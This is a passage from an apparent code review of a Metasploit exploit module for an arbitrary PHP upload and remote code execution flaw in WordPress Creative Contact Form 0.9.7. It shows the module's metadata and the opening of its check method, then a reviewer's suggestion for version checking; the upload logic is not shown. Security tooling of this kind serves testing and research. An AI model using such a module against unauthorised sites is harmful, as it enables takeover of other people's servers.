modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb

```diff
@@ -0,0 +1,80 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::HTTP::Wordpress
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Wordpress Creative Contact Form Upload Vulnerability',
+      'Description'    => %q{
+        This module exploits an arbitrary PHP code upload in the WordPress Creative Contact
+        Form version 0.9.7. The vulnerability allows for arbitrary file upload and remote code execution.
+      },
+      'Author'         =>
+        [
+          'Gianni Angelozzi', # Vulnerability discovery
+          'Roberto Soares Espreto <robertoespreto[at]gmail.com>'  # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['EDB', '35057'],
+          ['OSVDB', '113669']
+        ],
+      'Privileged'     => false,
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [['Creative Contact Form 0.9.7', {}]],
+      'DisclosureDate' => 'Oct 22 2014',
+      'DefaultTarget'  => 0)
+    )
+  end
+
+  def check
+    res = send_request_cgi(
```

Comment:
You can replace this check code by:
check_plugin_version_from_readme('sexy-contact-form', version)

See: http://plugins.svn.wordpress.org/sexy-contact-form/tags/0.9.7/readme.txt

you can also check with check_plugin_version_from_readme and then check with the current check to be sure the files exist